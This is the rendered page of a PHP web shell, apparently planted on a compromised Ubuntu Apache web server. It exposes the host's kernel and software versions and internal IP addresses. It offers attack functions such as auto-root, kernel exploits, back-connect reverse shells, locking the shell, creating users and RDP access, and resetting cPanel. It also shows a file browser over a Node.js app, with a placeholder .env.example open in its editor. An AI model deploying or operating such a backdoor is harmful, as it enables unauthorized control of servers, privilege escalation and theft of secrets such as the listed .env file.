Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
server /
[ HOME SHELL ]
Name
Size
Permission
Action
middleware
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.env
935
B
-rw-r--r--
.env.example
1.04
KB
-rw-r--r--
generate-credentials.cjs
2.1
KB
-rw-r--r--
index.js
4.6
KB
-rw-r--r--
package-lock.json
61.45
KB
-rw-r--r--
package.json
779
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .env.example
# Server Environment Configuration # IMPORTANT: Copy this file to .env and update all values # NEVER commit .env to version control! # Server Configuration PORT=5000 NODE_ENV=production # JWT Secret - REQUIRED! Generate with: # node -e "console.log(require('crypto').randomBytes(32).toString('hex'))" JWT_SECRET=your-super-secret-jwt-key-min-32-characters-long # Admin Credentials - REQUIRED! # Generate password hash with: # node -e "const bcrypt = require('bcryptjs'); console.log(bcrypt.hashSync('YourSecurePassword123!', 10))" ADMIN_USERNAME=admin ADMIN_PASSWORD=$2b$10$YourHashedPasswordHere # Frontend URLs (for CORS) - Update these! # Development FRONTEND_URL=http://localhost:5173 # Production - Add your actual domain PRODUCTION_URL=https://yourdomain.com # Optional: Use wildcard for subdomains # PRODUCTION_URL=https://*.yourdomain.com # Notes: # 1. Generate a strong JWT_SECRET (at least 32 characters) # 2. Always hash passwords with bcrypt # 3. Update PRODUCTION_URL to your actual domain # 4. Keep this file secure and never commit it to git
Close